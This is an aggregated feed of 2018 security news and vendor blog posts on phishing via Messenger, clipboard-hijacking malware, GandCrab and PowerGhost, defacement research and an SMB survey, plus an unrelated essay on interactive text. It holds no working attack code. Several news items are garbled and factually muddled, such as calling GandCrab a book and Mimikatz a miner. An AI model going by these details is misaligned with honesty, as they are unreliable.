Author Archives:

E Hacking News – Latest Hacker News and IT Security News: Facebook Messenger: A Weapon of Cyber Scoundrels?

Facebook Messenger: A Weapon of Cyber Scoundrels?

According to what FBI has warned about, Facebook Messenger is being used by cyber crooks to entrap the users into opening malicious links.

These links are a pathway for the wrongdoers to the personal data of the user.

 The villainous cyber cons are up for their new trick. Basically, the criminals of the cyberspace are disseminating a message link which is pretty susceptible for people to open.

FBI officials of the Portland office were quick to take the scam into account and released a cautionary warning about the latest prevalent trickery that is taking place. Facebook Messenger was emphasized upon pretty clearly by the feds, even before they had confirmed about the rip-off happening on other messaging apps as well. The feds originally in their statement, had warned the public that Facebook messenger is the single area of concern but later, rectified their statement when traces of the scam showed up on other platforms too.

It’s not just Facebook’s messenger that’s twisted between the shackles of the cyber misdeed, there are other instant messaging apps in the list too. The agenda behind the scam is obtaining the personal details of the users, like login credentials for social networking sites, such as Facebook, by getting them to click on the malicious links that come along with a URL, in their inboxes.

With the objective of compelling the victims to click on the shady URL, a question is ingeniously placed, which reads, ‘Hey I saw this video. Isn’t this you?’  (Now who could say no to that?)

The number of people victimized by this scam is indefinite and so is the cyber cons’ method of making through this. Nonetheless, it’s no surprise that the login credentials including passwords and other details are marketed on the vicious internet.

A fraudulent, Facebook login page lookalike is created. The people are deceived into believing that they are logging into their Facebook. Any details mentioned therein are stolen and could be used to log into other sites where the same credentials are used.  According to the feds, other forms of this scam are way too direct and directly wrest the data by asking to fill credentials.

A very well-known version of the scam reads, ‘Alton Towers is giving away 5 free tickets to 500 families.’ Another variation read, “we’re giving 5 free passes to 500 families to celebrate our 110th birthday!’ The clicker is later directed to an online survey form, which needs to be filled and is promoted to forward it to friends within the instant messaging app.

The scam was excavated on the Messenger of Facebook, but moreover, now WhatsApp and various other applications aren’t left alone either.

E Hacking News - Latest Hacker News and IT Security News

E Hacking News – Latest Hacker News and IT Security News: New mechanism for computer hacking

Top cyber threat experts will rub shoulders on Wednesday in Last Vegas to dwelt at length the artificial intelligence technique that could help the hackers bypass the multi layered security measures.
The experts at the upcoming a Black Hat Security Conference are basically expected to focus the computer security from a new perspective to help the cyber security frayernity proceed with utmost care and confidence. The security firms got wind of the impending threat in the cyber world when a team of cyber defence experts from IBM Corp disclosed the details of the artificial intelligence technique deployed to hack a computer settings. The speakers are set to concentrate on the software and the its damaging character much to the benefit of those concentrating on the cyber defencing people engaged in many firms. So far nobody has claimed to have caught the software in question with the help of artificial intelligence. But according to what the researchers say, lots remain to come up for the days to come since the issue is a very hard one to be handle. Detecting the details of the software or the threat is a challenging task. What the hackers have done clearly suggests that they have an effective mechanism to carry out more attacks with a target to be reached. They have every potential to build up programme to carry out a Stuxnet like attack by US against a uranium storage in Iran. Top researchers engaged with IBM said the upcoming demonstrations or revelations will be of great significance in the next couple of years. There in lies the importance of the summit slated for Wednesday. A path breaking conference on an entry level automated programme took place in New York where the cyber defence experts demonstrated attacks and the successful approaches thereof. Now they say the evil inside these need to be exposed. To sum up, these new mechanism of machine learning seems to have given the computer hackers some new advantage.

E Hacking News - Latest Hacker News and IT Security News

Cycle OverRide: McGhies is Sold Out

The awesome news – This might be the biggest CycleOverride at Defcon Ride ever!

The bad news – McGhies has rented out so many bikes to all of you they are now sold out.

Looking forward to seeing everyone already signed up bright and early tomorrow!

Cycle OverRide

E Hacking News – Latest Hacker News and IT Security News: A New Malicious Campaign Whip Around $60,000 of Bitcoin

July 2018, saw the reports of a recently discovered malicious campaign by the Fortiguard Labs. The campaign "Bitcoin Stealer" is as of now held responsible of stealing roughly $60,000 worth in Bitcoin.

The researchers from the FortiGuard Labs initially ran over a threat that at first coordinated a few tenets particular to the Jigsaw ransom ware back in April 2018, yet later on after a considerably more critical look it was revealed that the threat, which contained the assembly name "BitcoinStealer.exe," did not figure like a ransom ware at all.

As unlike to ransom ware, the Bitcoin Stealer rather used an executable to screen the contaminated PC's clipboard content for indications of a bitcoin address. When it finds one of these addresses, the malware at that point replaces that replicated bitcoin address with an alternate one containing similar strings at both the start and the end of that wallet address.

By using this technique, the malware basically mixes itself specifically into bitcoin transactions and after that, halfwit users into transferring cryptocurrency to the wallet of the cybercriminal utilizing Bitcoin Stealer.

As indicated by Techopedia, these stealing programs are cases of clipboard hijacking, an attack strategy through which attackers generally change clipboard content to guide browser users to a malignant website.The Programmers however, are additionally known to utilize a strategy called "pastejacking" to meddle with commands replicated from a web browser and paste into the terminal.

The question though that arises now is thusly aimed at the security specialists with respect to whether there will be sufficient insurance given against such episodes of clipboard modification attacks as digital attackers indeed have a long history of targeting clipboards in order to steal cryptocurrency or redirect users to malware.

E Hacking News - Latest Hacker News and IT Security News

TrendLabs Security Intelligence Blog: How Machine Learning Can Help Identify Web Defacement Campaigns

By Federico Maggi, Marco Balduzzi, Ryan Flores, and Vincenzo Ciancaglini

Website defacement — the act of visibly altering the pages of a website, notably in the aftermath of a political event to advance the political agenda of a threat actor— has been explored in our various research works. We broke down top defacement campaigns in a previous paper and, in another post, emphasized how machine learning in our security research tool can help Computer Emergency Readiness Teams (CERTs)/Computer Security Incident Response Teams (CSIRTs) and web administrators prepare for such attacks. The latter took off from the analysis done in our most recent paper, Web Defacement Campaigns Uncovered: Gaining Insights From Deface Pages Using DefPloreX-NG. Here we expound on why machine learning (ML) was an ideal method for our analysis to better understand how web defacers operate and organize themselves.

Facilitating machine learning techniques with DefPloreX-NG

In 2017, we presented DefPloreX, a machine learning toolkit that can be used for large-scale e-crime forensics. This year, we presented DefPloreX-NG, a version of the toolkit with enhanced machine learning algorithms and new visualization templates. In our recent web defacement paper, we used DefPloreX-NG to go beyond anecdotal evidence and analyze 13 million deface records spanning 19 years. It can also be used by security analysts and researchers to identify ongoing and live web defacement campaigns, including new and so far unknown ones. The improved and expanded toolkit allows for efficient filtering of actionable intelligence from raw deface sites. It can automatically identify and track defacement campaigns and assigns meaningful textual labels for each campaign’s attributes. In addition, it makes it easier to sort and search sites, for example, according to threat actor or group responsible, motivation, type of content or propaganda, top-level domain (TLD), category of defaced site (media outlet, etc.), and others. The processes involved are heavily aided by machine learning.

Figure 1. Diagram of the automated analysis of deface pages using DefPloreX-NG

  • Historical and live dataset: For the research we used a dataset based on a unique collection of defacement records from five major reporting sites. By using these reporting sites we were able to provide feeds of defacement records, aggregated from various sources such as sharing initiatives, CERTs, or victim organizations, among others. As a first step, we had to ensure that the datasets we used were trustworthy,[1] meaning we had to prioritize data on actual site content over metadata. Relying on actual content (such as website, images, text of defacement message, etc.) was key to drawing any meaningful conclusions.
  • Assigning attributes to the featureless dataset: We assigned attributes to the dataset (timestamp of the defacement event, category of the deface site, etc.). From the raw content (e.g., rendered HTML, images or other media files), we extracted a set of characteristics that we could translate into useful features. By assigning these features we were able to capture visual characteristics such as images or dominant colors, geographical ones drawing from languages used, or related to domains which, for example, indicate the ratio of links pointing to cross-origin domains, among others.
  • Clustering based on assigned features: Next, we grouped similar deface pages into clusters based on the features we extracted (see Figure 2). For this purpose we used ML-based data clustering. Similar pages will have similar features and thus will end up being clustered together. Clustering allowed us to organize web incidents into campaigns. Since our dataset contained millions of records, each represented by tens of features, we chose an algorithm that addresses any constraints in available memory and time.

Note: Feature engineering is central to any clustering problem. We identified features that could be extracted to represent a deface page.

Figure 2. Sample deface page and features extracted for clustering

  • Clustering versus classification: We used unsupervised machine learning, i.e., data clustering. The lack of ground truth is the reason why we opted for data clustering as the core of our analysis system, with each deface page serving as an object represented as a tuple of numerical and categorical features.
  • Labels: After clustering, we labeled the clusters and visualized the campaigns in terms of various dimensions (e.g., length of time, actors, targets, topics, etc.). To provide analysts with an explainable and human-readable view of the clustered deface pages, we represented each cluster as a concise report that includes the time span (oldest and newest deface page) and a list of patterns that create a meaningful label of that cluster. These representations, enabled by the toolkit, allowed us not only to recognize defacement in a monitored benign page but also to tell various defacement campaigns apart.

Sample findings based on common attributes

As mentioned DefPloreX-NG aids analysts to draw details from the analysis of web defacement records, including characteristics of threat actor groups — from what TLDs they target to how they are organized and how they operate.  Some of the specific findings we could draw from our analysis included the following:

  • Topics of messages by defacers evolved over time: To see how the messages left by defacers evolved over time, we used an off-the-shelf ML technique called topic modeling, which is widely used in new classification to determine the subject of a story. The topic modeling algorithm can sort a large amount of data (e.g., deface pages) into a small set of high-level concepts or topics. This showed us an evolution of topics defacers cared about, as reflected in major terms mentioned in deface messages that also tied back to real-world events during the time of defacement. For example, in some years, “pope,” “terror,” “country,” “marocain,” and “turk” were among the top terms in deface pages, coinciding with events such as the papal conclave in 2005 or the Turkish general election in 2007. An understanding of the most common topics also allowed us to make some inferences as to the motivations and affiliations of the various threat actors. As revealed by “marocain” and “terror” keywords, many defacers seem to model themselves as online activists that support religious or sociopolitical ideologies.
  • Similar targets and cooperation: Campaigns that had similar targets often also overlapped in political agenda and/or motivation, revealing how the actors behind them were likely collaborating.

Note: The analysis from DefPloreX-NG shows there are nine campaigns, with each campaign having participants that are either teams or defacers.

Figure 3. Overview of campaigns related to the Charlie Hebdo attack

  • Threat actor overlap: One interesting insight from our analysis was that threat actors behind attacks could be acting as lone wolves, but they also often join forces or cooperate on an ad-hoc basis. Cooperation with other groups can be identified, for example, when two defacement pages use many similar characteristics (such as font size, background color, similar color scheme). Such similarities are a strong attribution indicator, and in turn allow analysts to group defacements together and understand the relationships between groups and actors. We rely on this indicator for our automated approach in detecting and tracking campaigns.
  • Groups vs. single actors: After manually inspecting thousands of deface pages, we found that modern defacers were not simply lone “script kiddies” but tended have team affiliations. Nearly half of the attackers (47 percent) behind defacement campaigns were affiliated with at least one group; the rest operated solo. Very often, names of the teams as well as their members appeared in the content of deface pages. Most of the campaigns (70 percent) were conducted as a joint operation and not the work of lone wolf attackers.
  • Duration vs. intensity: DefPloreX-NG can automatically label a campaign as long-term or aggressive based on its behavior over time. We found a contrast in how long-term and aggressive campaigns are conducted (see Figure 4). Each cell represents the number of attacks conducted by a campaign per year. Long-term campaigns conduct slower and longer attacks while aggressive campaigns react to geographical events (such as terrorist attacks) and prefer massive attacks conducted a few days after the event.

Figure 4. Long-term campaigns (top) and most intense and aggressive campaigns (bottom)

Defacers leave traces behind and we have shown examples of how we used these traces and machine learning to automate the analysis of millions of cases by grouping individual defacement incidents into categories of similar activity, type, and threat actor responsible. We took a data-driven approach and employed machine learning capabilities to turn unstructured data into meaningful high-level descriptions. Without an automated system, going through 13 million records would have been extremely time- and resource-intensive given the large amount of processing power such a task would have required. We used machine learning in a security tool beyond detection, also building intelligence based on a host of details that can be used for research and other analyses.

To read more about DefPloreX-NG, how it can be used to analyze defacement campaigns, and how ML techniques aided our analysis, see our recent research paper.

[1] The information volunteered by the actors behind defacements are not always reliable for risk of misleading information purposefully planted in the information supplied.

The post How Machine Learning Can Help Identify Web Defacement Campaigns appeared first on .

TrendLabs Security Intelligence Blog

The State of Security: Beware: Real Estate Scams are Growing

What does the chairman of MIT’s board of trustees and a Supreme Court judge for New York State have in common with the Weintraubs of Lebanon, Oregon? They were all victims of real-estate spoofing scams, a form of cyber-security fraud that has grown from $19 million in 2016 to over $1B in 2017. Thieves have […]… Read More

The post Beware: Real Estate Scams are Growing appeared first on The State of Security.

The State of Security

Blog | Avast EN: New Wi-Fi attack can crack your passwords | Avast

When you’re using a Wi-Fi network these days, chances are you are counting on one of these protocols: WPA or WPA2. In short, your Wi-Fi signal is protected by the Wi-Fi Protected Access (WPA or WPA2) encryption standard. These wireless industry standards were designed to prevent potential hackers from intercepting the signal and reading your browsing data. Here’s the bad news: It was just reported that while investigating the new WP3 standard, a security researcher managed to break the encryption. So what’s the good news? At least now we know.

Blog | Avast EN

Untangle: Untangle Survey Finds SMBs Rank Network Security as Top IT Concern

SMBs Struggle to Combat New Security Threats as Organizations
Increasingly Turn to Cloud Technologies

SAN JOSE, Calif.– August 2, 2018 – Untangle®, Inc., a leader in comprehensive network security for small-to-medium business (SMB), today released the results of their first annual SMB IT Security Report. The findings explore IT security apprehensions for small and mid-size businesses, showing that Firewall/Network rated as the top security concern for these organizations, particularly as they begin to deploy increasing levels of infrastructure to the cloud and provide access to larger numbers of devices across their networks.

SMBs will always face limited budgets and resources constraints to allocate towards IT security compared to larger enterprises. However, SMBs face a double whammy as they are just as or more likely than enterprises to be targeted by cybercriminals, but are less equipped to deal with the fallout of a successful breach. It is imperative that SMBs take a proactive approach instead of waiting to become victims. Untangle conducted a survey polling more than 350 SMBs worldwide to better understand the challenges they face securing their networks, data and users.

The 2018 SMB IT Security Report found that SMBs consistently struggle to deploy IT security solutions with underfunded security budgets and lack of security expertise, with more than half of the organizations surveyed acknowledging they distribute security responsibilities across other roles in the organization. Increasing reliance on cloud infrastructure has also sparked increased concern for network security as more companies plan to, or are researching, SD-WAN solutions.

Key findings from the survey include:

  • Less than 30 percent of SMBs surveyed have a dedicated IT security professional on staff; 50 percent distribute IT security responsibilities across other roles.

  • 75 percent of SMBs surveyed have fewer than five physical locations, but only 60 percent have fewer than 100 end-user devices to manage.

  • Top IT security concerns include budget constraints (47 percent) and limited time to research and understand new threats (37 percent).

  • Of the organizations that experienced an attack in the last 12 months, 33 percent were from phishing attacks, 27 percent from malware and 15 percent from ransomware.

  • 50 percent of organizations polled have IT budgets under $5,000 per year or less; half of those had less than $1,000 per year to spend on security.

“SMBs have less expertise and fewer dollars to dedicate to IT security, but they are the primary target of a growing number of phishing and malware threats, particularly as they move towards more cloud-based tools,” said Scott Devens, chief executive officer at Untangle. “This report confirms that SMBs are in dire need of easy-to-deploy, intuitive solutions to protect their networks that don’t require hiring additional personnel or time-intensive commitments from existing staff.”

Untangle offers complete network security solutions for small and medium businesses with limited IT resources and budgets. NG Firewall, its unified threat management solution, provides a comprehensive solution for content filtering, malware and threat protection, secure Wi-Fi, application control, bandwidth optimization, virtual private networks and more. Known industry-wide for its ease-of-use and comprehensive reporting, NG Firewall is the number one choice of small-to-medium businesses and distributed organizations. NG Firewall is seamlessly integrated with Untangle’s cloud services, including ScoutIQ™ threat intelligence and Command Center centralized management. Command Center lets administrators manage their deployments with ease and convenience from any browser without requiring an on-premise footprint.

For more information about Untangle, please visit Download a free copy of the report here.

About Untangle
Untangle is an innovator in cybersecurity designed specifically for the below-enterprise market, safeguarding businesses, home offices, nonprofits, schools and governmental organizations. Untangle’s integrated suite of software and appliances provides enterprise-grade capabilities and consumer-oriented simplicity to organizations with limited IT resources. Untangle’s award-winning network security solutions are trusted by over 40,000 customers around the world. Untangle is headquartered in San Jose, California. For more information, visit

Media Contact
Lisette Rauwendaal
Lumina PR for Untangle
(408) 827-4363


E Hacking News – Latest Hacker News and IT Security News: GandCrabs takes on AhnLab antivirus

An epoch-making author take the centre stage of discourse in the cyberworld these days.

Popularly known as GandCrab Ransamware, the book drew attention of millions of the people when the author was worried after a vaccine for GrandCrab ransomware that hit the market.

 The author moved the BleepingComputer as he had some amount of new informations to be added in the new versions of the book.

He maintained that GrandCrab would have a day when the service to AhnLab anti-virus software would be denied.

 According to what the author claims, AhnLab was in the receipt of payback after he launched the vaccine app for GrandCrab ransomware.

The vaccine app, precisely, is responsible for a file on the personal computing device. An active ransomware would suggest the impact on the device in question.

 In a number of communiques in different modes to Bleeping Computer, Crabs called Killswitch, the vaccine app a bunch of useless things immediately after he released his new ransomware version AhnLab launched it.

 Significantly, the author in the new versions of the Grandcrabs got included an exploit code to take on the AhnLab anti-virus.

 Initially, Bleeping Computer was in a process to publish the feature. But by then an expert claimed to have discovered the issue even as AhnLab had nothing to be worried with these schemes of things.

The company observed that their product spotted the GandCrab ransomware which reached the BSOD attack code later and that the code in question has little chance to be at work.
The experts here say the code that missed the storm in the cyber world is nothing but a denial of service code or not a zero day code.

They observed that the code somehow, caused BSOD to the AhnLab product and the attack code can hardly execute any payload.

E Hacking News - Latest Hacker News and IT Security News

Blog | Avast EN: TSMC shut down by WannaCry variant | Avast

Questions still surround the TSMC (Taiwan Semiconductor Manufacturing Company) computer virus incident which shut down operations for the world’s largest semiconductor foundry last Friday, August 3. While the company maintains this was not due to a cyberattack, it also reports that the virus was a variant of WannaCry, the ransomware that terrorized the world last year.

Blog | Avast EN

liquid thoughts: A Theoretical Model for Knowledge Work & Symbol Manipulation (4 Aug)

This is an attempt to highlight the inherent interactivity of digital text, the value which can be extracted by realising the interactive potential and areas of investigation.

[first draft]

Textual Knowledge

To look at how we can advance the power of interactive text to augment our knowledge work, we need to look at what text is; how text encodes knowledge, how we decode knowledge from it and how text in a digital substrate is different from text on an analog substrate.

Text : Rule Based Linearly Connected Nodes

Text, whether a single character in a word or a word in a sentence, achieves meaning from other text. This makes text a rule-based ‘nodal’ medium (the word ‘node’ originally meant ‘knot’ and as such only exists as intersections of connections) and this highlights the inherent interactivity of text: Text has no meaning without connection and to extract the maximum utility from text we should investigate what further interactions can be powerfully useful.

Writing is flexible enough to handle all the spoken words in the language they represent and coherent enough that the text may be reliably ‘read’, based on rules. Without the first there would not be much to write down and without the second the ambiguity threshold would be too high and would make the text ‘unreadable’ and un-dependable to be a witness to the authors thoughts.

The connections in text include:

• Connecting different characters using ‘vocalisation’ rules to provide a huge vocabulary.

• Connecting different words using ‘grammar’ rules provide a huge potential of knowledge expression.

• Connecting to external sources through implicit links to give us a wide web of context shared with the reader to tap on.

• Connecting to external sources through explicitly presenting addresses giving us a potential credibility for assertions and arguments if they ‘stack up’ for the reader.

Digital Text

This ‘readability’ is what makes textual even more powerful when it exists in a digital substrate where the screen is only a re-presentation of the symbols in the system, interacted with through layers of pre-designed manipulations from the digital native zeros and ones to the beautifully high resolution lines forming elegant type on your screen–in order to reach your screen the symbols must be interacted with but this is usually pre-done. The power the user can get from giving the user control over the interactions with the symbols is vast.

Weaving Knowledge

With the reservations of some specific tasks and professions, working with knowledge on computer systems is primarily ‘literally;’ the act of looking–at and for–the connections of textual nodes of knowledge, reforming connections between nodes and packaging them to share new insights, which can all be seen as acts of weaving knowledge.

I don’t use the term ‘information’ since I think it’s important to keep in mind that authored text is primarily from an author’s mind, not neutral information somehow objectively placed into a document. For the textual knowledge looked at here, we are not looking at ‘dry’ facts but liquid opinions and perspectives of authors and readers and how they can influence change in perspectives or solidify prejudices.

The Author Reader Partnership

The act of authoring is to linearly encode connections between nodes into a linear, frozen text and the act of reading is to decode them and to investigate the logic and credibility of the connections in the text (logical & cited) as well as seeing how they connect to wider, non-explicit contexts. As such, the symbols, the ‘stuff of knowledge’, serve very different purposes when authoring and reading:

• When authoring the text are nodes in various levels of visual linearity which the author needs to linearise.

• When reading the nodes are in a linear order and the reader needs to re-order them to better understand all the connections.

Encoding Knowledge: Authorship

Authorship is Thinking with Symbols to Make a Linear Argument

The act of authorship is the act of choosing which symbols (expressing fresh thoughts, recorded notes or linked citations) should appear in which order in a linear presentation.

This act of choosing and arranging can be done in one fell swoop when writing something the author knows well and which does not require further investigation or thought. The more the author needs to learn about the subject of the text, the more editing will naturally occur as the author thinks while glancing over what she has written so far. With digital environments, thinking and editing becomes an intimate round-trip from the space of symbols via the computer screen and trackpad and keyboard and the users mind.

Research Areas

Basic support for this process include the ability to drag and drop text and cut and paste. The opportunities to improve the authorship process remain immense however: Means through which the author can contract and expand lengths of text for easier overviews and manual and automatic concept-map like layouts which deliver interactions only digital text can make possible.

As any author who has written anything but the shortest document will know, is mentally taxing, with different elements needing to be made available somehow for the author to string together and then re-position while thinking further and while seeing how the pieces actually fit. Research questions include working to find out the best representations of text for different views and interactions.

Potential Benefits of Improvements

Using the processing power of the author’s visual processing occipital lobe to augment their short term memory and higher level thought prefrontal cortex can free up more creative thinking and open up mental space for more critical thinking. This is just the start of what can be done and what we understand. Further research can point to ways higher and lower pathway visual processing can further augment visual thinking.

The Results of Authorship

Authorship Freezes

The use of text to store knowledge is an imperfect and non-complete attempt to freeze the knowledge into a fixed set of rigid symbols in a non-fixed context. We venerate text for it’s objectivity and longevity but anyone who has read anything from an older generation, let alone from someone who authored a few hundred years ago like Shakespeare, is firmly aware how the context has moved while the text stayed still.

Authoring Confers ‘Authority’

The fixedness of the lines of text and the solidity this proffers on what is written, as well as the vast majority of the history of writing associating well-formed (printed) text with great expense and therefore worth, gives ‘authority’ beyond what is reasonable in a digital environment where writing and distribution can be cheap but consumption expensive, given that the ratio of sources for a reader will always vastly outstrip the individual readers ability to consume and to reply.

Extracting & Evaluating Knowledge : Readership

Readership is Critical Interpretation & the Feeding of Spark Points

For a reader to approach a text with ‘an open mind’ but without the passivity which would simply ‘brainwash’ requires a mental space for the reader which is outside the scope of discussions of interactive text (such as the removal of mental loads of different kinds of worries and the educational supplementing of mental tools for interrogation and self-awareness) but it is clear that people are much more amenable to ‘changing’ their minds if they make discoveries on their own rather than being told by someone else. This is a primary reason why providing as rich tools to interact with text as possible is crucially important, to be able to deal with the readers curiosity when sparked, as quickly and easily as possible, before the spark fades, making the text itself so interactive that Socrates would have approved.

Research Areas

The interaction the spark needs to be met by is an interactive reading system where the reader can somehow handle the text fluidly to see different aspects of the text or to navigate through the text’s explicit and implicit connections.

How the reader can most powerfully see different types of connections and interrogate the text provides a wealth of important research opportunities. One experiment I have already done on this is making implicit links effortless to follow, through the Liquid | Flow utility: which highlights the real benefits of simple additions to the readers interaction arsenal and gives an indication of what can be done with real research and testing.

Potential Benefits of Improvements

To break through this initial visual frozen text (even the most interactive text is visually still until the reader interacts with it) is to set the text free for the reader to literally dive deeper into the texts authored and environmental connections and to more quickly and correctly assign relevance and value to the text and to better understand the expressed meaning of the text and it’s wider context.

This rich interaction will be crucial to build a better informed, better connected, more harmonious society, though of course not in isolation from other also crucial efforts.

Connecting Author & Reader : Addressability

In order to do the reading and the writing – in order to weave and unweave, the text must be ‘somewhere’, it must be somehow addressable. A key aspect of interactive text then is addressability, since you cannot interact with something which isn’t ‘there’, where ‘there’ is defined as specific space which can be addressed, where this space of the address can be very local or more universal.

The most local and basic addressing is simply having something interactable on a computer screen so that the user can put their cursor over the text, double click (or equivalent) to select it and choose to Copy the text, Spell Check it or something else. Without local addressing the computer would not know where the users cursor is or where the text is.

Networks of text, colloquially referred to as ‘hypertext’ in our community, relies on wider access addressability afforded by domain name systems and the world wide web system, where text can encode the location of a document on another physical or virtual computer with an address, such as and can then further specify the directory of the document by adding / and the name of the directory and further the name of the document, ending with the type of encoding is used, such as .html. If the author of the document has taken care of if the authoring software does it, the address can end with a hashtag denoting an anchor placed inside the text, allowing the reader to follow a link to that very location.

Research Areas

This is a rich opportunity for research and practical implementations since it literally opens up new possibilities for knowledge representation and connection–in short: how we can connect determines the size of the representation of our mental worlds.

liquid thoughts

E Hacking News – Latest Hacker News and IT Security News: Cyber security breached in Reddit

A hacker is said to have struck many devices belonging to Reddit forcing the American social aggregation and web content rating website to keep millions of its users on alert. The attack was confirmed after the top security experts found that many systems have been breached in between June 14 and June 18. The hacker in question further got access to the user data involving many email identities, usernames, passwords and what not. According to what the sources say, the affected users, mostly, are individuals who joined the club till 2007. Stunned by the incident of sensational security breach by the hackers in between June 14 and June 18, Reddit is preparing mails to its users---both affected and unaffected to be aware of such sudden incidents in future. The attack is believed to have got the access of all emails which the company sent to the users and most of them received these in June, 2018. The cyber criminal got the access to the mechanism to go through the emails which the premier website company got to know only around June 20. The users who are still keeping active have been asked to immediately change their usernames and sensitive passwords immediately to ensure that these remain safe. Through emails Reddit has asked its users to change the current passwords saying that the new password should not be similar to the old one. Otherwise, these are not still safe from the hackers. May it be Reddit or other sites. According to the company, the users are free to use two steps for authentication—Google or Authy. It would disallow the criminals to easily get an easy access to the existing system. In a recent post, Reddit made it simple that hackers compromised the security of many of its employees in mid-June through cloud provider ans source code. The company further admitted that the cyber criminals managed to get into the details of the SMS verification process. But the data have remained unchanged. “We learned that SMS-based authentication. The subsequent investigation uncovered many crucial things relating to this chapter. The extent of damage is not little which requires the help of the law enforcing agencies. Such an agency has been probing the chapter with the inputs it received from Reddit.

E Hacking News - Latest Hacker News and IT Security News

Blog | Avast EN: SamSam ransomware can shut your city down | Avast

SamSam ransomware was first spotted in the digital wild back in 2015. Since then, its purveyors have racked up approximately $6M in extorted ransom money, experts surmise, and its diabolical reign shows no sign of slowing. The ransomware continues to be improved upon to make it sneakier, with its newest version encrypting files late at night, hoping to infect the system when the user is away from the screen. Additionally, the recent SamSam attacks all seem strategic and deliberate, as opposed to automated outbreaks, making them some of the most feared and destructive cyberattacks active today.

Blog | Avast EN

Data Security Blog | Thales eSecurity: Three Reasons You Should Treat Applications as Machine Identities in Your Security Strategy

This article was originally featured as a guest post on Venafi’s blog. Thales eSecurity and Venafi are technology partners.

Three Reasons You Should Treat Applications as Machine Identities in Your Security Strategy

One of the biggest threat to machine identities today is the integrity of the software that runs within them, and that dictates their programed function. Whereas many machines worked independently in the past, the availability of ubiquitous communications is making it possible for networks of machines – including sensors, cloud applications, and distributed controls – to work in concert. This change has significantly expanded the data available to machines and the number of distributed actions they can affect.

Protecting the identities of applications is one of three major challenges that must be addressed to ensure trust and facilitate the adoption of transformational technologies employing the use of connected devices (machines) in the rapidly growing Internet of Things (IoT) and DevOps environments.

1 – We need to be able to trust the data that comes from applications

Because machines increasingly talk to each other and exchange important data that they collect, strong mutual authentication and trust between these is critical. This is the first challenge, strong authentication requires trusted identities. If one cannot trust the machines, there is no point in collecting, running analytics, and executing decisions based on that data they collect.

2 – We need to be sure that data flows freely from application to application

The second challenge is the protection of the integrity and confidentiality of the data collected as it flows from machine to machine, including applications which execute decisions (often without human intervention) based on that data. Because machines collect sensitive and personal data, privacy and regulatory compliance must also be a concern.

3 – We need to constantly verify the integrity of the applications themselves

The third challenge, and the one I believe to be most concerning, is the threat to the integrity of the software. As machines (devices and applications) require regular updates as part of their lifecycle, the legitimacy and integrity of the downloaded code must be preserved to protect from potentially damaging malware and other attacks.

The reason this is such a critical issue is that the machine identity might remain intact, but its execution might become compromised. Think of this as a trusted soldier going rogue. The individual is still the same person, but they may shift their allegiance. If software upgrades are not properly signed to give them a verifiable identity, they can provide a conduit through which malware can be introduced to collect and re-direct sensitive data, compromise users’ privacy, and perform functions that are damaging to the enterprise.

Machine/device credentialing and code signing are fundamental aspect to consider when developing a comprehensive security strategy that addresses the increasing use of machines, and this is why code signing is so important. Enterprises embarking in digital transformation initiatives need to be cognizant of the potential threats to machine identities, including the identity of the software that machines run.

This is especially true in DevOps and other Fast IT environments. Because software is developed and deployed more quickly, attackers who want to assume the identity of a trusted enterprise are stealing the certificates that organizations use to sign their code. If an organization’s code-signing key or certificate is compromised, attackers can use it to authenticate malware so it can be distributed widely.

To address this challenge at scale, we need to offer applications the same protections that we provide for machines. Automated and secure cryptographic key orchestration is required to safeguard the identities of our applications.

To learn more visit Thales Booth 1222 and Venafi Booth 144 at Black Hat USA 2018 in Las Vegas. Or follow me on Twitter @asenjojuan

The post Three Reasons You Should Treat Applications as Machine Identities in Your Security Strategy appeared first on Data Security Blog | Thales eSecurity.

Data Security Blog | Thales eSecurity

E Hacking News – Latest Hacker News and IT Security News: Digital Enemy of the Corporate Networks

To add up to the numerous malwares, a new member named, PowerGhost malware, has joined the family lately. Like wildfire, this malware is swiftly finding its way into the corporate networks, mostly corrupting workstations and servers. Reason being, the ill legitimate mining of the crypt currency and operating DDoS (Distributing Denial of Service) attacks for gaining major profit.

PowerGhost malware miner is stumbled upon the most in Brazil, Colombia, Turkey, and India. It has successfully and unfortunately, infected the organizations’ local area networks.

It’s imperative for all the corporate bodies to choose the best prevention software to counter the DDoS attacks. Attackers use file-less malware techniques to uphold the continuity and use it to circumvent the anti-virus detection and pile up on the vulnerabilities by making use of exploits like ‘Eternal Blue’.

Infection Modes of PowerGhost malware

At the outset, the victims were infected by remote administration tools or by using out of the way exploits and the PowerShell scripts which at an instant launched it into the hard drive.

Basically, PowerGhost performs as an obscure PowerShell script that comprises a number of core modules. For instance, libraries for mining operations, miners and PE file injection for Eternal Blue exploit.

Some of them are:-
msvcp120.dll and msvcr120.dll (Libraries)
Mimikatz (Miner)
PE injection and shellcode

The malware also tries to speed about the local networks using ‘Eternal Blue’ (MS17-010, CVE-2017-0144). Afterward, it lands into the new system with the surprising 32 and 64-bit exploits for MS-16-032, MS-15-051, and CVE-2018-8120.

The scripts operate at quite a few stages and can competently ‘Self-update’. Its module keeps checking its C2 server. The moment the module finds something, it automatically updates itself and ultimately, the script dispatches the miner by loading a PE file through the reflective PE injection.

According to one of the major anti-virus brands, with the assistance of Mimikatz, the miner could attain the user’s account and credentials from the current machine. The miner could also use them to make an attempt towards proliferating across the local networks by releasing a copy of itself via WMI and download the miner body from C2 server.

As a result of research it has been uncovered that for conducting DDoS attacks one of the many tools is one of the versions of PoweGhost and it is used for making money along with the mining operation profit. 


E Hacking News - Latest Hacker News and IT Security News

McAfee Blogs: GandCrab Ransomware Puts the Pinch on Victims

The GandCrab ransomware first appeared in January and has updated itself rapidly during its short life. It is the leading ransomware threat. The McAfee Advanced Threat Research team has reverse engineered Versions 4.0 through 4.2 of the malware.

The first versions (1.0 and 1.1) of this malware had a bug that left the keys in memory because the author did not correctly use the flags in a crypto function. One antimalware company released a free decryption tool, posted on

The hack was confirmed by the malware author in a Russian forum:

Figure 1. Confirmation by the author of the hack of GandCrab servers.

The text apologizes to partners for the hack and temporarily shuts down the program. It promises to release an improved version within a few days.

The second version of GandCrab quickly appeared and improved the malware server’s security against future counterattacks. The first versions of the ransomware had a list of file extensions to encrypt, but the second and later versions have replaced this list with an exclusion list. All files except those on the list were encrypted.

Old versions of the malware used RSA and AES to encrypt the files, and communicated with a control server to send the RSA keys locked with an RC4 algorithm.

The GandCrab author has moved quickly to improve the code and has added comments to mock the security community, law agencies, and the NoMoreRansom organization. The malware is not professionally developed and usually has bugs (even in Version 4.2), but the speed of changes is impressive and increases the difficulty of combating it.

Entry vector

GandCrab uses several entry vectors:

  • Remote desktop connections with weak security or bought in underground forums
  • Phishing emails with links or attachments
